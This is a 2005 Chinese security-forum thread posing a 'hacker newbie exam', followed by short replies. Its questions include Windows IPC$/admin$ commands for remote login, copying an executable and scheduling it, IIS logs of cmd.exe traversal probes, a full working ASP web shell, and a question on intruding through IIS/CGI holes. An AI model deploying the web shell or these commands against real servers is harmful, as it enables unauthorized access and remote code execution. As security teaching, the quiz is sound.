论坛: 菜鸟乐园 标题: 一份黑客菜鸟试卷,欢迎各位朋友作答 复制本贴地址    
作者: xp0710 [xp0710]    论坛用户   登录
本帖由 [NetDemon] 从 << 黑客进阶>> 转移而来

一、 http://192.168.0.1 http://xyz.3322.org http://3232235521
三个连接指向同一目标网站,那么它们分别是什么意义?

二、
常用端口识别
20 21 23
25 80 110
139 443 445

三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator”
c:\>net use z: \\211.87.194.121\c$
c:\>net time \\211.87.194.121
c:\>copy abc.exe \\211.87.194.121\admin$\system32

四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe

五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。

六、
netstat命令有何作用,举出两个参数进行说明。

七、
试述木马的一些基本特征。

八、
如何利用脚本实现对ftp的自动操作?

九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%

Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")
If (szCMD <> "") Then

szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分)
那么,如何在不打补丁的情况下避免这种攻击的发生?

十一、OSI模型中哪一层上有协议?分别是什么?

十二、观察ping命令的返回包的TTL值,可以了解到什么?

十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?

十四、谈谈你对hacker和网络安全的认识

地主 发表时间: 05-05-27 17:31

回复: toumings3 [toumings3]   论坛用户   登录
呵呵
基本上都看的懂
不过还要继续努力

B1层 发表时间: 05-05-27 19:45

回复: on89757 [zhaowenli]   论坛用户   登录
前面能看懂。
后面的代码就看不明白了。
还得多学习~


B2层 发表时间: 05-05-29 11:47

回复: hllnw [hllnw]   论坛用户   登录
您说说呀


B3层 发表时间: 05-07-20 10:48

回复: authen [authen]   论坛用户   登录
这种问题招人工资不会超过800

B4层 发表时间: 05-07-20 13:14

回复: lijingxi [lijingxi]   见习版主   登录
这种问题招人工资不会超过800


不知道什么地方招工会出这样的问题!~ 呵呵!~~
不过我觉得要是考这样问题的公司 公司绝对不会少于2K RMB

B5层 发表时间: 05-07-20 18:57

回复: authen [authen]   论坛用户   登录
这样的话俺的工资应该超过1W了

B6层 发表时间: 05-07-21 10:34

回复: tuzi [tuzi]   版主   登录
N久不到菜鸟园中来了

灌个谁

11 这项我是没看明白
十一、OSI模型中哪一层上有协议?分别是什么?

哪层都有协议 如果要说出来 恐怕要说不完了

B7层 发表时间: 05-07-21 15:23

回复: zoull2004 [zoull2004]   论坛用户   登录
一,第一个表示IP地址,第二、三应该是域名
六,用netstate?命令

B8层 发表时间: 05-07-22 09:03

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号